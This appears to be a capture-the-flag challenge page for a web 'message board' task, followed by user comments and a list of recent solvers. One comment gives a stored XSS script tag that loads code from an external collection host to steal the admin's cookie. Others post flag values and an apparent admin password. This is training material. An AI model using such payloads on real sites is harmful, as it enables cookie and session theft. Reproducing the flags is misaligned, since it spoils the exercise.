留言板WEB 未解决

分数: 10 金币: 3
题目作者: harry
一血奖励: 5金币
解  决: 3117
提  示: 题目无需登录后台!需要xss平台接收flag
描  述:
http协议需要http协议的xss平台
评论
skiller 3年前

db.sql是怎么搜出来的?我用dir没搜出来啊?

回复 9

BugKugirl 3年前

在线XSS平台(https://xss.pt/)生成xss代码(<sCRiPt sRC=//0x.ax/AUBv></sCrIpT>)放到留言板,xss平台直接获得cookie : flag=flag%7Bf7784e4107be555d08be73ac01569c6f%7D,将flag进行url解码(http://www.jsons.cn/urlencode)

回复 0

1317554973 3年前

拿到xss得flag填进去但不对

回复 0

17695688750 3年前

奥原来%7b和%7d是{}的asc码,我憨批了

回复 0

17695688750 3年前

我插入了图片xss,平台给我回显了这个flag=flag%7B34211b64224e890f37244b7b065fc409%7D,有人知道怎么转译成正确的flag么

回复 0
zhaiwb 3年前

%7b换成{}

回复 0

13509329442 3年前

url解码

回复 0

泡椒控卫 3年前

https://blog.csdn.net/m0_57954651/article/details/127621060

回复 0

不知名学渣 3年前

管理员账号密码[admin,011be4d65feac1a8],就是不知道怎么来的,望大佬告知

回复 0

2478660446 3年前

用xss在线平台可以试试 但是要等一段时间 flag=flag{7B57845943ba8c6225d2fbade764481e8d}

回复 0

wkxy. 3年前

用dirsearch进行目录扫描

回复 0

缺少昵称 3年前

好难啊,我是菜鸟

回复 0

WriteUp

image
丶我亚索贼六

5 金币

评分(18)

解题动态

zzuer 攻破了该题 16小时前
123456lulu 攻破了该题 1天前
WWWWWWYY 攻破了该题 1天前
WYYYYTT 攻破了该题 2天前
igrazee 攻破了该题 2天前
zrc2682 攻破了该题 2天前
bhcxzhdsa 攻破了该题 3天前
鲲中霸王 攻破了该题 3天前
xiaodd 攻破了该题 3天前
244012105 攻破了该题 3天前
白菜白又白 攻破了该题 3天前
2301144040 攻破了该题 4天前
weini12345 攻破了该题 5天前
zxcvbnmzhang 攻破了该题 7天前
out不慢 攻破了该题 8天前
顾无澜 攻破了该题 10天前
luo157 攻破了该题 10天前
sunshb07 攻破了该题 12天前
紫色心情 攻破了该题 15天前
caocao 攻破了该题 16天前
问题反馈